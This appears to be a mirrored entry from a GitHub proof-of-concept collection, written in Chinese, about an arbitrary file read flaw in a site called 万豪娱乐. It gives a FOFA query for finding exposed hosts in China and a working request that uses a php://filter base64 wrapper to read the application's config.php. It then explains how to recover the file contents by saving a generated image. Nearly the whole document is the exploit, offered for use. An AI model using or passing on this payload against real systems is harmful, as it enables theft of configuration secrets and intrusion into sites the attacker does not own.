mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-13 03:16:31 +00:00
21 lines
634 B
Markdown
21 lines
634 B
Markdown
|
# 万豪娱乐存在任意文件读取漏洞
|
|||
|
|
|
|||
|
|
万豪娱乐存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
"Public/Js/Mobile" && country="CN"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
**使用poc访问后,接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容**
|
|||
|
|
|